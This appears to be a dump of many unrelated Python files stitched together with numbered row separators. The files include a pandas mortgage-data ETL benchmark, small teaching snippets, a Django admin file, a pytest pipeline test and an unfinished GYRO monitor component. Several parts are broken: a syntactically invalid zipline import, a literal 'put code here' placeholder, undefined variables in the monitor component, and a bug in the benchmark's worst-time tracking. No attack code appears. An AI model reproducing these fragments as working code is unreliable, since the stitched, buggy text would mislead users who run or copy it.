print("compute time with copy to host", exec_time)
return final_pdf, exec_time
def pd_load_performance_csv(performance_path, **kwargs):
""" Loads performance data
Returns
-------
PD DataFrame
"""
cols = [
"loan_id", "monthly_reporting_period", "servicer", "interest_rate", "current_actual_upb",
"loan_age", "remaining_months_to_legal_maturity", "adj_remaining_months_to_maturity",
"maturity_date", "msa", "current_loan_delinquency_status", "mod_flag", "zero_balance_code",
"zero_balance_effective_date", "last_paid_installment_date", "foreclosed_after",
"disposition_date", "foreclosure_costs", "prop_preservation_and_repair_costs",
"asset_recovery_costs", "misc_holding_expenses", "holding_taxes", "net_sale_proceeds",
"credit_enhancement_proceeds", "repurchase_make_whole_proceeds", "other_foreclosure_proceeds",
"non_interest_bearing_upb", "principal_forgiveness_upb", "repurchase_make_whole_proceeds_flag",
"foreclosure_principal_write_off_amount", "servicing_activity_indicator"
]
dtypes = {
"loan_id": np.int64,
"monthly_reporting_period": str,
"servicer": str,
"interest_rate": np.float64,
"current_actual_upb": np.float64,
"loan_age": np.float64,
"remaining_months_to_legal_maturity": np.float64,
"adj_remaining_months_to_maturity": np.float64,
"maturity_date": str,
"msa": np.float64,
"current_loan_delinquency_status": np.int32,
"mod_flag": CategoricalDtype(['N', 'Y']),
"zero_balance_code": CategoricalDtype(['01', '02', '06', '09', '03', '15', '16']),
"zero_balance_effective_date": str,
"last_paid_installment_date": str,
"foreclosed_after": str,
"disposition_date": str,
"foreclosure_costs": np.float64,
"prop_preservation_and_repair_costs": np.float64,
"asset_recovery_costs": np.float64,
"misc_holding_expenses": np.float64,
"holding_taxes": np.float64,
"net_sale_proceeds": np.float64,
"credit_enhancement_proceeds": np.float64,
"repurchase_make_whole_proceeds": np.float64,
"other_foreclosure_proceeds": np.float64,
"non_interest_bearing_upb": np.float64,
"principal_forgiveness_upb": np.float64,
"repurchase_make_whole_proceeds_flag": CategoricalDtype(['N', 'Y']),
"foreclosure_principal_write_off_amount": np.float64,
"servicing_activity_indicator": CategoricalDtype(['N', 'Y']),
}
return pd.read_csv(performance_path, names=cols, delimiter='|', dtype=dtypes, parse_dates=[1,8,13,14,15,16])
def pd_load_acquisition_csv(acquisition_path, **kwargs):
""" Loads acquisition data
Returns
-------
PD DataFrame
"""
columns = [
'loan_id', 'orig_channel', 'seller_name', 'orig_interest_rate', 'orig_upb', 'orig_loan_term',
'orig_date', 'first_pay_date', 'orig_ltv', 'orig_cltv', 'num_borrowers', 'dti', 'borrower_credit_score',
'first_home_buyer', 'loan_purpose', 'property_type', 'num_units', 'occupancy_status', 'property_state',
'zip', 'mortgage_insurance_percent', 'product_type', 'coborrow_credit_score', 'mortgage_insurance_type',
'relocation_mortgage_indicator', 'year_quarter'
]
dtypes = {
'loan_id': np.int64,
'orig_channel': CategoricalDtype(['B', 'C', 'R']),
'seller_name': str,
'orig_interest_rate': np.float64,
'orig_upb': np.int64,
'orig_loan_term': np.int64,
'orig_date': str,
'first_pay_date': str,
'orig_ltv': np.float64,
'orig_cltv': np.float64,
'num_borrowers': np.float64,
'dti': np.float64,
'borrower_credit_score': np.float64,
'first_home_buyer': CategoricalDtype(['N', 'U', 'Y']),
'loan_purpose': CategoricalDtype(['C', 'P', 'R', 'U']),
'property_type': CategoricalDtype(['CO', 'CP', 'MH', 'PU', 'SF']),
'num_units': np.int64,
'occupancy_status': CategoricalDtype(['I', 'P', 'S']),
'property_state': CategoricalDtype(
['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI',
'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN',
'MO', 'MS', 'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH',
'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI',
'VT', 'WA', 'WI', 'WV', 'WY']),
'zip': np.int64,
'mortgage_insurance_percent': np.float64,
'product_type': CategoricalDtype(['FRM']),
'coborrow_credit_score': np.float64,
'mortgage_insurance_type': np.float64,
'relocation_mortgage_indicator': CategoricalDtype(['N', 'Y']),
'year_quarter': np.int64
}
a = pd.read_csv(acquisition_path, names=columns, delimiter='|', dtype=dtypes, parse_dates=[6,7], error_bad_lines=True, warn_bad_lines=True, na_filter=True)
return a
def pd_load_names(**kwargs):
""" Loads names used for renaming the banks
Returns
-------
PD DataFrame
"""
cols = [
'seller_name', 'new'
]
dtypes = {'seller_name':str, 'new':str}
return pd.read_csv(os.path.join(data_directory, "names.csv"), names=cols, delimiter='|', dtype=dtypes)
def create_ever_features(pdf, **kwargs):
everdf = pdf[['loan_id', 'current_loan_delinquency_status']]
everdf = everdf.groupby('loan_id').max()
del(pdf)
everdf['ever_30'] = (everdf['current_loan_delinquency_status'] >= 1).astype('int8')
everdf['ever_90'] = (everdf['current_loan_delinquency_status'] >= 3).astype('int8')
everdf['ever_180'] = (everdf['current_loan_delinquency_status'] >= 6).astype('int8')
everdf.drop(columns=['current_loan_delinquency_status'], inplace=True)
return everdf
def create_delinq_features(pdf, **kwargs):
delinq_pdf = pdf[['loan_id', 'monthly_reporting_period', 'current_loan_delinquency_status']]
del(pdf)
delinq_30 = delinq_pdf.query('current_loan_delinquency_status >= 1')[['loan_id', 'monthly_reporting_period']].groupby('loan_id').min()
delinq_30['delinquency_30'] = delinq_30['monthly_reporting_period']
delinq_30.drop(columns=['monthly_reporting_period'], inplace=True)
delinq_90 = delinq_pdf.query('current_loan_delinquency_status >= 3')[['loan_id', 'monthly_reporting_period']].groupby('loan_id').min()
delinq_90['delinquency_90'] = delinq_90['monthly_reporting_period']
delinq_90.drop(columns=['monthly_reporting_period'], inplace=True)
delinq_180 = delinq_pdf.query('current_loan_delinquency_status >= 6')[['loan_id', 'monthly_reporting_period']].groupby('loan_id').min()
delinq_180['delinquency_180'] = delinq_180['monthly_reporting_period']
delinq_180.drop(columns=['monthly_reporting_period'], inplace=True)
del(delinq_pdf)
delinq_merge = delinq_30.merge(delinq_90, how='left', on=['loan_id'])
delinq_merge['delinquency_90'] = delinq_merge['delinquency_90'].fillna(np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]'))
delinq_merge = delinq_merge.merge(delinq_180, how='left', on=['loan_id'])
delinq_merge['delinquency_180'] = delinq_merge['delinquency_180'].fillna(np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]'))
del(delinq_30)
del(delinq_90)
del(delinq_180)
return delinq_merge
def join_ever_delinq_features(everdf_tmp, delinq_merge, **kwargs):
everdf = everdf_tmp.merge(delinq_merge, on=['loan_id'], how='left')
del(everdf_tmp)
del(delinq_merge)
everdf['delinquency_30'] = everdf['delinquency_30'].fillna(np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]'))
everdf['delinquency_90'] = everdf['delinquency_90'].fillna(np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]'))
everdf['delinquency_180'] = everdf['delinquency_180'].fillna(np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]'))
return everdf
def create_joined_df(pdf, everdf, **kwargs):
test = pdf[['loan_id', 'monthly_reporting_period', 'current_loan_delinquency_status', 'current_actual_upb']]
del(pdf)
test['timestamp'] = test['monthly_reporting_period']
test.drop(columns=['monthly_reporting_period'], inplace=True)
test['timestamp_month'] = test['timestamp'].dt.month
test['timestamp_year'] = test['timestamp'].dt.year
test['delinquency_12'] = test['current_loan_delinquency_status']
test.drop(columns=['current_loan_delinquency_status'], inplace=True)
test['upb_12'] = test['current_actual_upb']
test.drop(columns=['current_actual_upb'], inplace=True)
test['upb_12'] = test['upb_12'].fillna(999999999)
test['delinquency_12'] = test['delinquency_12'].fillna(-1)
joined_df = test.merge(everdf, how='left', on=['loan_id'])
del(everdf)
del(test)
joined_df['ever_30'] = joined_df['ever_30'].fillna(-1)
joined_df['ever_90'] = joined_df['ever_90'].fillna(-1)
joined_df['ever_180'] = joined_df['ever_180'].fillna(-1)
joined_df['delinquency_30'] = joined_df['delinquency_30'].fillna(-1)
joined_df['delinquency_90'] = joined_df['delinquency_90'].fillna(-1)
joined_df['delinquency_180'] = joined_df['delinquency_180'].fillna(-1)
joined_df['timestamp_year'] = joined_df['timestamp_year'].astype('int32')
joined_df['timestamp_month'] = joined_df['timestamp_month'].astype('int32')
return joined_df
def create_12_mon_features(joined_df, **kwargs):
testdfs = []
n_months = 12
for y in range(1, n_months + 1):
tmpdf = joined_df[['loan_id', 'timestamp_year', 'timestamp_month', 'delinquency_12', 'upb_12']]
tmpdf['josh_months'] = tmpdf['timestamp_year'] * 12 + tmpdf['timestamp_month']
tmpdf['josh_mody_n'] = np.floor((tmpdf['josh_months'].astype('float64') - 24000 - y) / 12)
tmpdf = tmpdf.groupby(['loan_id', 'josh_mody_n'], as_index=False).agg({'delinquency_12': 'max','upb_12': 'min'})
tmpdf['delinquency_12'] = (tmpdf['delinquency_12']>3).astype('int32')
tmpdf['delinquency_12'] +=(tmpdf['upb_12']==0).astype('int32')
tmpdf['timestamp_year'] = np.floor(((tmpdf['josh_mody_n'] * n_months) + 24000 + (y - 1)) / 12).astype('int16')
tmpdf['timestamp_month'] = np.int8(y)
tmpdf.drop(columns=['josh_mody_n'], inplace=True)
testdfs.append(tmpdf)
del(tmpdf)
del(joined_df)
return pd.concat(testdfs)
def combine_joined_12_mon(joined_df, testdf, **kwargs):
joined_df.drop(columns=['delinquency_12', 'upb_12'], inplace=True)
joined_df['timestamp_year'] = joined_df['timestamp_year'].astype('int16')
joined_df['timestamp_month'] = joined_df['timestamp_month'].astype('int8')
return joined_df.merge(testdf, how='left', on=['loan_id', 'timestamp_year', 'timestamp_month'])
def final_performance_delinquency(merged, joined_df, **kwargs):
merged['timestamp_month'] = merged['monthly_reporting_period'].dt.month
merged['timestamp_month'] = merged['timestamp_month'].astype('int8')
merged['timestamp_year'] = merged['monthly_reporting_period'].dt.year
merged['timestamp_year'] = merged['timestamp_year'].astype('int16')
merged = merged.merge(joined_df, how='left', on=['loan_id', 'timestamp_year', 'timestamp_month'])
merged.drop(columns=['timestamp_year'], inplace=True)
merged.drop(columns=['timestamp_month'], inplace=True)
return merged
def join_perf_acq_pdfs(perf, acq, **kwargs):
return perf.merge(acq, how='left', on=['loan_id'])
def last_mile_cleaning(df, **kwargs):
#for col, dtype in df.dtypes.iteritems():
# if str(dtype)=='category':
# df[col] = df[col].cat.codes
df['delinquency_12'] = df['delinquency_12'] > 0
df['delinquency_12'] = df['delinquency_12'].fillna(False).astype('int32')
return df #.to_arrow(index=False)
# Load database reporting functions
pathToReportDir = os.path.join(pathlib.Path(__file__).parent, "..", "report")
print(pathToReportDir)
sys.path.insert(1, pathToReportDir)
import report
parser = argparse.ArgumentParser(description='Run Mortgage benchmark using pandas')
parser.add_argument('-r', default="report_pandas.csv", help="Report file name.")
parser.add_argument('-df', default=1, type=int, help="Number of datafiles (quarters) to input into database for processing.")
parser.add_argument('-dp', required=True, help="Path to root of mortgage datafiles directory (contains names.csv).")
parser.add_argument('-i', dest="iterations", default=5, type=int, help="Number of iterations to run every benchmark. Best result is selected.")
parser.add_argument("-db-server", default="localhost", help="Host name of MySQL server")
parser.add_argument("-db-port", default=3306, type=int, help="Port number of MySQL server")
parser.add_argument("-db-user", default="", help="Username to use to connect to MySQL database. If user name is specified, script attempts to store results in MySQL database using other -db-* parameters.")
parser.add_argument("-db-pass", default="omniscidb", help="Password to use to connect to MySQL database")
parser.add_argument("-db-name", default="omniscidb", help="MySQL database to use to store benchmark results")
parser.add_argument("-db-table", help="Table to use to store results for this benchmark.")
parser.add_argument("-commit", default="1234567890123456789012345678901234567890", help="Commit hash to use to record this benchmark results")
args = parser.parse_args()
if args.df <= 0:
print("Bad number of data files specified", args.df)
sys.exit(1)
if args.iterations < 1:
print("Bad number of iterations specified", args.t)
db_reporter = None
if args.db_user is not "":
print("Connecting to database")
db = mysql.connector.connect(host=args.db_server, port=args.db_port, user=args.db_user, passwd=args.db_pass, db=args.db_name);
db_reporter = report.DbReport(db, args.db_table, {
'FilesNumber': 'INT UNSIGNED NOT NULL',
'FragmentSize': 'BIGINT UNSIGNED NOT NULL',
'BenchName': 'VARCHAR(500) NOT NULL',
'BestExecTimeMS': 'BIGINT UNSIGNED',
'BestTotalTimeMS': 'BIGINT UNSIGNED',
'WorstExecTimeMS': 'BIGINT UNSIGNED',
'WorstTotalTimeMS': 'BIGINT UNSIGNED',
'AverageExecTimeMS': 'BIGINT UNSIGNED',
'AverageTotalTimeMS': 'BIGINT UNSIGNED'
}, {
'ScriptName': 'mortgage_pandas.py',
'CommitHash': args.commit
})
data_directory = args.dp
benchName = "mortgage_pandas"
perf_data_path = os.path.join(data_directory, "perf")
perf_format_path = os.path.join(perf_data_path, "Performance_%sQ%s.txt")
bestExecTime = float("inf")
bestTotalTime = float("inf")
worstExecTime = 0
worstTotalTime = 0
avgExecTime = 0
avgTotalTime = 0
for iii in range(1, args.iterations + 1):
dataFilesNumber = 0
time_ETL = time.time()
exec_time_total = 0
print("RUNNING BENCHMARK NUMBER", benchName, "ITERATION NUMBER", iii)
for quarter in range(0, args.df):
year = 2000 + quarter // 4
perf_file = perf_format_path % (str(year), str(quarter % 4 + 1))
files = [f for f in pathlib.Path(perf_data_path).iterdir() if f.match('Performance_%sQ%s.txt*' % (str(year), str(quarter % 4 + 1)))]
for f in files:
dataframe, exec_time = run_pd_workflow(year = year, quarter = (quarter % 4 + 1), perf_file = str(f))
exec_time_total += exec_time
dataFilesNumber += 1
time_ETL_end = time.time()
ttt = (time_ETL_end - time_ETL) * 1000
print("ITERATION", iii, "EXEC TIME: ", exec_time_total, "TOTAL TIME: ", ttt)
if bestExecTime > exec_time_total:
bestExecTime = exec_time_total
if worstExecTime < exec_time_total:
worstExecTime = exec_time_total
avgExecTime += exec_time_total
if bestTotalTime > ttt:
bestTotalTime = ttt
if worstTotalTime < ttt:
bestTotalTime = ttt
avgTotalTime += ttt
avgExecTime /= args.iterations
avgTotalTime /= args.iterations
try:
with open(args.r, "w") as report:
print("BENCHMARK", benchName, "EXEC TIME", bestExecTime, "TOTAL TIME", bestTotalTime)
print("datafiles,fragment_size,query,query_exec_min,query_total_min,query_exec_max,query_total_max,query_exec_avg,query_total_avg,query_error_info", file=report, flush=True)
print(dataFilesNumber, ",",
0, ",",
benchName, ",",
bestExecTime, ",",
bestTotalTime, ",",
worstExecTime, ",",
worstTotalTime, ",",
avgExecTime, ",",
avgTotalTime, ",",
"", '\n', file=report, sep='', end='', flush=True)
if db_reporter is not None:
db_reporter.submit({
'FilesNumber': dataFilesNumber,
'FragmentSize': 0,
'BenchName': benchName,
'BestExecTimeMS': bestExecTime,
'BestTotalTimeMS': bestTotalTime,
'WorstExecTimeMS': worstExecTime,
'WorstTotalTimeMS': worstTotalTime,
'AverageExecTimeMS': avgExecTime,
'AverageTotalTimeMS': avgTotalTime})
except IOError as err:
print("Failed writing report file", args.r, err)
|
12,770 | 5b7646765a115c011cac5bd85619613458fcbd9c | from hdlc import *
|
12,771 | 9f65465a983411f02e8cc9710ab19898d2c818b9 | from painter import Painter
def algorithm(picture, args):
"""
Try to use horizontal lines for each cell
"""
painter = Painter(picture.empty_copy())
for row, column in painter.picture.positions_to_paint(picture):
if painter.picture[row][column]:
continue
length = 0
for i in range(column + 1, picture.shape[1]):
if picture[row][i]:
length += 1
else:
break
painter.paint_line(row, column, row, column + length)
return painter
|
12,772 | 3ea259588809064b6d0abcb53b7881b1bd18d91b | '''
Created on Feb 9, 2016
@author: zluo
'''
from zipline.algorithm import TradingAlgorithm (
add_history,
history,
order_target,
record,
symbol,
) |
12,773 | 9f658f847396b8050ce2b8444d75b02972d85400 | import math
import numpy as NP
alpha = 0.2 #learning rate
def f(z):
return 1/(1 + math.e ** (-z))
def gradientDescent(x, y, theta, m):
xTrans = x.transpose()
for _ in xrange(10**5):
h = NP.dot(x,theta)
for i in xrange(len(h)):
h[i] = f(h[i])
loss = h - y
gradient = NP.dot(xTrans,loss)/m
theta = theta - alpha * gradient
return theta
print "Enter the number of data points"
m = int(raw_input())
x = NP.zeros((m, 2))
y = NP.zeros(m)
print "Now enter the feature value followed by the 0 or 1 for classification"
for i in xrange(m):
x[i][1],y[i]=map(float,raw_input().split()) #input x and y coordinates
x[i][0] = 1
print "inputs done"
theta = NP.zeros(2)
theta = gradientDescent(x,y,theta,m)
print "start entering the test data"
while True:
T =float(raw_input())
print "The confidence value that the object is of type 1 is:", f(NP.dot([1,T],theta))
|
12,774 | 42e4f043291af77d766ad7b23ec8ed59e4cfd4d2 | import itertools
string = input("String a ser permutada: ")
result = itertools.permutations(string,len(string))
for i in result:
print(''.join(i)) |
12,775 | d24a06405b0902959c7d81634512869e24b0afdb | # Aggregation represent has-a relationship
class Salary:
def __init__(self, pay, bonus):
self.pay = pay
self.bonus = bonus
def annual_salary(self):
return self.pay*12 + self.bonus
class Employee:
def __init__(self, name, age, salary):
self.name = name
self.age = age
self.obj_salary = salary
def total_salary(self):
return self.obj_salary.annual_salary()
salary = Salary(15000, 10000) # The associated class have unidirectional property
emp = Employee("Rahul", 26, salary) # salary is passed in employee..not the other way round
print(emp.total_salary())
# salary and emp are independent... if one object dies, other survive... |
12,776 | 71367cba6609ba522f4433c4540c3b7270de6ee5 | from django.contrib import admin
from django.contrib.contenttypes.admin import GenericStackedInline
from ugc.models import Post
from like.models import Like
class LikeInline(GenericStackedInline):
ct_field = 'target_type'
ct_fk_field = 'target_id'
model = Like
max_num = 1
class PostAdmin(admin.ModelAdmin):
list_display = ('author', 'short_text', 'updated_at')
inlines = [
LikeInline
]
def short_text(self, post):
return post.text[:30]
admin.site.register(Post, PostAdmin)
|
12,777 | abba228366a38232666763472ff9a5ebcfc2d5df | #!/usr/bin/python3
"""Square class"""
class Square:
""" It is the class for define a square: My first class"""
__size = ''
def __init__(self, size=0):
self.__size = size
try:
"{:d}".format(size)
if size < 0:
raise TypeError
except(TypeError):
print("size must be >= 0", end="")
raise ValueError
except(ValueError):
print("size must be an integer", end="")
raise TypeError
|
12,778 | 9ef569cf08f3d1f1b7394338f8c1db3fde88a18a | from calcDiscriminatives import calcDisc
from tabelsB import makeTables
taskID={"digestion-Cogs":1, "phylogenetic-Cogs":2, "digestion-Operons":3, "phylogenetic-Operons":4}
cogsPrecent = ["30", "40", "50", "60", "80", "90"]
def main():
print("digestion-Cogs")
sendParameters("digestion-Cogs", 3)
print("phylogenetic-Cogs")
sendParameters("phylogenetic-Cogs", 8)
print("digestion-Operons")
sendParameters("digestion-Operons", 3)
print("phylogenetic-Operons")
sendParameters("phylogenetic-Operons", 8)
def sendParameters(taskName, classesAmount):
classesAmount += 1
for param in cogsPrecent:
for i in range(1, classesAmount, 1):
for j in range (i+1, classesAmount, 1):
class1matrix, class2matrix, class1name, class2name, cogsAmount = makeTables(i, j, taskID[taskName], param)
if (len(class1matrix) > 0 and len(class2matrix) > 0):
calcDisc(class1matrix, class2matrix, taskName, param, class1name, class2name, cogsAmount)
else:
print("skipping classes ", class1name, class2name)
if __name__ == "__main__":
main();
|
12,779 | 66a4fbbc8e5e24526c74aa2bcca8dbf18343801d | """Tests for the whole pipeline which is in test.
Focuses on verifying if all the file are created and similar to
what is expected.
Run this from project root directory:
$ python -m pytest
"""
import pytest
import subprocess
import shutil
import os
import filecmp
import textdistance
import numpy as np
@pytest.fixture(scope="session")
def run_pipeline():
shutil.rmtree('tests/current_output',ignore_errors=True)
os.mkdir('tests/current_output')
process = subprocess.Popen("./tests/execute_whole_pipeline.sh", shell=True, stdout=subprocess.PIPE)
process.wait()
#print("Doing something")
#raise
return
def test_find_expected_files_preprocess(run_pipeline):
root = "tests/current_output"
list_files = ["output.fast5"]
for file_name in list_files:
assert(os.path.exists(os.path.join(root,file_name)))
def test_find_expected_files_calling(run_pipeline):
root = "tests/current_output"
list_files = ["output_file.fa","output_file.fa_ratio_B"]
for file_name in list_files:
assert(os.path.exists(os.path.join(root,file_name)))
def compute_differences(f1_n,f2_n,numerical=False):
with open(f1_n,"r") as f1 , open(f2_n,"r") as f2:
lines_1 = f1.readlines()
lines_2 = f2.readlines()
if len(lines_1) != len(lines_2):
return {"lines":len(lines_1)-len(lines_2),"n_line":len(lines_1)}
d=0
val = []
#print(len(lines_2))
for l1,l2 in zip(lines_1,lines_2):
if l1 != l2:
if not numerical:
d += textdistance.hamming(l1,l2)
else:
if l1.startswith(">"):
d += textdistance.hamming(l1,l2)
else:
p1 = np.array(list(map(float,l1.strip().split())))
p2 = np.array(list(map(float,l2.strip().split())))
print(f"percent b string1 {np.nanmean(p1):.2f} percent b string 2 {np.nanmean(p2):.2f} , size {len(p1)}")
val.append(np.abs(np.nanmean(p1)-np.nanmean(p2)))
return {"letters":d,"n_line":len(lines_1),"val":val}
def test_compare_file_calling(run_pipeline):
root = "tests/current_output"
ref = "tests/test_whole_pipeline_reference"
list_files = ["output_file.fa","output_file.fa_ratio_B"]
for file_name in list_files:
f_ref = os.path.join(ref,file_name)
f_new = os.path.join(root, file_name)
numerical = False
if "ratio" in f_ref:
numerical = True
delta = compute_differences(f_ref,f_new,numerical=numerical)
if "lines" in delta.keys():
print(f"{f_ref} and {f_new} have different number of lines")
assert(False)
elif delta["letters"] > 100:
print(f"{f_ref} and {f_new} have same number of lines")
print(f"But are two different, hamming distance is {delta['letters']}")
assert(False)
elif "val" in delta.keys() and np.mean(delta["val"])>0.10:
print(f"{f_ref} and {f_new} have same number of lines")
print(f"But are two different, mean val is {np.mean(delta['val'])}")
assert(False)
if __name__=="__main__":
root = "tests/current_output"
ref = "tests/test_whole_pipeline_reference"
file_n ="/output_file.fa_ratio_B"
delta = compute_differences(root+file_n,ref+file_n,numerical=True)
print(delta)
print(np.mean(delta["val"]))
|
12,780 | 3f96b1c0f3edfbae56ffd040656eb54b8af6b28e | #! /usr/bin/env python
"""
gyro_monitor_comp.py 3-4-2015
This is a monitor component to track progress of a GRYO run within IPS. It is completely
separate from the IPS monitor_comp.py component in that it does not use Plasma State and
and it runs concurrently with the gk_gyro.py component.
This component is also different from IPS monitor component in that the monitor file cannont
be defined until after the first time step. This is because the init() of the gk_gyro.py
component does not produce output files. So we don't know some of the dimensions until
after the first time step, e.g. the number of columns in the out.gyro.error file. So this
init function just pushes out the portal RUNID and config file to the www directory. The
actually initialization of the monitor file happens in step() after the first time step.
This script exports 4 SWIM component functions:
init - defines the netcdf monitor file for monitor data then calls step to insert the
initial data (t = t0). Also saves some internal data needed to restart the
monitor component (monitorVars and ps_VarsList). These are are pickled to file
'monitor_restart'
restart - unpickles the internal monitor data previously saved in file 'monitor_restart'
and loads these global variables.
step - writes monitor data for current time step to the monitor netcdf file and saves it
finalize - sets the global netcdf attribute to tell ELViz to stop watching this
monitor file
change log:
"""
import sys
import os
import subprocess
import shutil
import pickle
from component import Component
# Import the necessary Numeric and netCDF modules
from netCDF4 import *
from numpy import *
# ------------------------------------------------------------------------------
#
# Global definitions
#
# ------------------------------------------------------------------------------
debug = False
first_step = True
monitor_fileName = 'monitor_file.nc'
# List of requested variables to monitor (if dependencies are satisfied)
# The list just below is the default containing everything. In the component it can
# be overwritten with the configuration file data (some day maybe).
requestedVars = []
# List of variables to monitor (which dependencies are satisfied)
monitorVars = []
# List of grids needed to plot monitor variables
monitorGrids = []
# List of files in work directory containing variables to be monitored
filesList = ['out.gyro.t', 'out.gyro.error']
# List of non-grid dimensions needed for other variables - e.g. scalar lists
monitorDims = []
# Dictionary of Plasma State dependencies for each variable to be monitored:
monitorDefinition = {}
gyro_work_path = os.path.join('../','gk_gyro_gk_gyro_2')
# check that gyro_work_path exists
if debug:
monitorDefinition.update( { # testing
'dummy':['S', 'arb', ['stuff']], 'q':['P', 'arb',['ns'],['rho'] ]
} )
print 'monitor_comp_version = ', monitor_comp_version
print 'metaData = ',monitorDefinition['monitor_comp_metaData']
#----------------------------------------------------------------------------------------------
#
# Define some utility functions
#
#----------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------
# Open an input file and return the lines
def get_lines(filename):
try:
file = open(filename, 'r')
except Exception, e:
message = 'get_lines: could not open file ' + filename
print message, e
raise Exception, message
lines = file.readlines()
file.close()
return lines
class monitor(Component):
def __init__(self, services, config):
Component.__init__(self, services, config)
print 'Created %s' % (self.__class__)
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def init(self, timeStamp=0):
print 'gyro_monitor_comp.init() called'
services = self.services
workdir = services.get_working_dir()
run_id = services.get_config_param('PORTAL_RUNID')
monitor_file = 'monitor_file.nc'
# print 'monitor file = ', monitor_file
self.cdfFile = run_id+'_monitor_file.nc'
services.log('w3 monitor file = ' + self.cdfFile)
htmlFile = run_id +'.html'
# Get input files
try:
work_dir_path = self.WORK_DIR_PATH
except Exception, e:
message = 'gyro_monitor_comp.init: failed to get WORK_DIR_PATH'
print message, e
services.error(message)
raise Exception, message
# Generate initial monitor file
retcode = self.init_monitor_file(cur_state_file, timeStamp)
if (retcode != 0):
services.log('Error executing INIT: init_monitor_file')
return 1
# copy monitor file to w3 directory
try:
shutil.copyfile(monitor_file,
os.path.join(self.W3_DIR, self.cdfFile))
except IOError, (errno, strerror):
print 'Error copying file %s to %s: %s' % \
(monitor_file, self.cdfFile, strerror)
htmlText = self.htmlText.replace('@CDF_FILE@',
os.path.join(self.W3_BASEURL, self.cdfFile))
try:
f = open(os.path.join(self.W3_DIR, htmlFile), 'w')
f.write(htmlText)
f.close()
except IOError, (errno, strerror):
print 'Error writing to file %s : %s' % \
(htmlFile, strerror)
return
monitorURL = os.path.join(self.W3_BASEURL , htmlFile)
services.setMonitorURL(monitorURL)
# Copy config file to w3 directory
conf_file = services.get_config_param('SIMULATION_CONFIG_FILE')
print 'conf_file = ', conf_file
conf_file_name = os.path.split(conf_file)[1]
new_file_name = run_id + '_' + conf_file_name
new_full_path = os.path.join(self.W3_DIR, new_file_name)
try:
shutil.copyfile(conf_file, new_full_path)
except IOError, (errno, strerror):
print 'Error copying file %s to %s: %s' % \
(conf_file, new_full_path, strerror)
return
# ------------------------------------------------------------------------------
#
# restart function
#
# Load the internal state needed to restart the monitor component. In particular
# monitorVars and ps_VarsList are unpickeld pickled from a file "monitor_restart".
#
# ------------------------------------------------------------------------------
def restart(self, timeStamp):
"""
Function restart loads the internal monitor state data needed for
restart_MonitorComponent
"""
print 'monitor_comp.restart() called'
services = self.services
global monitorVars, ps_VarsList, monitorDefinition
workdir = services.get_working_dir()
run_id = services.get_config_param('PORTAL_RUNID')
monitor_file = 'monitor_file.nc'
# print 'monitor file = ', monitor_file
self.cdfFile = run_id+'_monitor_file.nc'
services.log('w3 monitor file = ' + self.cdfFile)
htmlFile = run_id +'.html'
# Get restart files listed in config file.
try:
restart_root = services.get_config_param('RESTART_ROOT')
restart_time = services.get_config_param('RESTART_TIME')
services.get_restart_files(restart_root, restart_time, self.RESTART_FILES)
except Exception, e:
print 'Error in call to get_restart_files()' , e
raise
# copy monitor file to w3 directory
try:
shutil.copyfile(monitor_file,
os.path.join(self.W3_DIR, self.cdfFile))
except IOError, (errno, strerror):
print 'Error copying file %s to %s: %s' % \
(monitor_file, self.cdfFile, strerror)
htmlText = self.htmlText.replace('@CDF_FILE@',
os.path.join(self.W3_BASEURL, self.cdfFile))
try:
f = open(os.path.join(self.W3_DIR, htmlFile), 'w')
f.write(htmlText)
f.close()
except IOError, (errno, strerror):
print 'Error writing to file %s : %s' % \
(htmlFile, strerror)
monitorURL = os.path.join(self.W3_BASEURL , htmlFile)
self.services.setMonitorURL(monitorURL)
# Load monitorVars and ps_VarsList from pickle file "monitor_restart".
pickleDict = {'monitorVars' : monitorVars, 'ps_VarsList': ps_VarsList,\
'monitorDefinition':monitorDefinition}
# pickleDict = {'monitorVars' : monitorVars, 'ps_VarsList': ps_VarsList}
pickFile = open('monitor_restart', 'r')
pickleDict = pickle.load(pickFile)
pickFile.close()
monitorVars = pickleDict['monitorVars']
ps_VarsList = pickleDict['ps_VarsList']
monitorDefinition = pickleDict['monitorDefinition']
print 'monitorDefinition = ', monitorDefinition
print 'monitor restart finished'
return 0
# ------------------------------------------------------------------------------
#
# step function
#
# Stages current input files (primarily plasma state). Updates the monitor_file.nc
# from current plasma state. And copies updated monitor file to w3 directory
#
# ------------------------------------------------------------------------------
def step(self, timeStamp):
print '\nmonitor_comp.step() called'
global first_step, monitor_fileName
services = self.services
if (self.services == None) :
print 'Error in monitor_comp: step() : no framework services'
return 1
# If this is the first call to step() initialize monitor file
if first_step == True:
# Check that gyro gyro has run long enough to produce output files, i.e.
# they exist. If not wait until they appear.
put code here
first_step == False
self.init_monitor_file(cur_state_file, timeStamp = 0)
monitor_file = monitor_fileName
# Call Load new data into monitor file
retcode = self.update_monitor_file(cur_state_file, timeStamp)
if (retcode != 0):
print 'Error executing command: update_monitor_file'
return 1
# "Archive" output files in history directory
services.stage_output_files(timeStamp, self.OUTPUT_FILES)
# copy montor file to w3 directory
try:
shutil.copyfile(monitor_file,
os.path.join(self.W3_DIR, self.cdfFile))
except IOError, (errno, strerror):
print 'Error copying file %s to %s: %s' % \
(monitor_file, self.W3_DIR, strerror)
return
# ------------------------------------------------------------------------------
#
# checkpoint function
#
# Saves restart files to restart directory. Should include: monitor_restart and
# monitor_file.nc
# ------------------------------------------------------------------------------
def checkpoint(self, timestamp=0.0):
print 'monitor.checkpoint() called'
services = self.services
services.save_restart_files(timestamp, self.RESTART_FILES)
# ------------------------------------------------------------------------------
#
# finalize function
#
# Calls monitor executable in "FINALIZE" mode which sets
# 'running' atribute to false so Elvis will stop watching the monitor file.
#
# ------------------------------------------------------------------------------
def finalize(self, timestamp=0.0):
print 'monitor finalize finished'
return 0
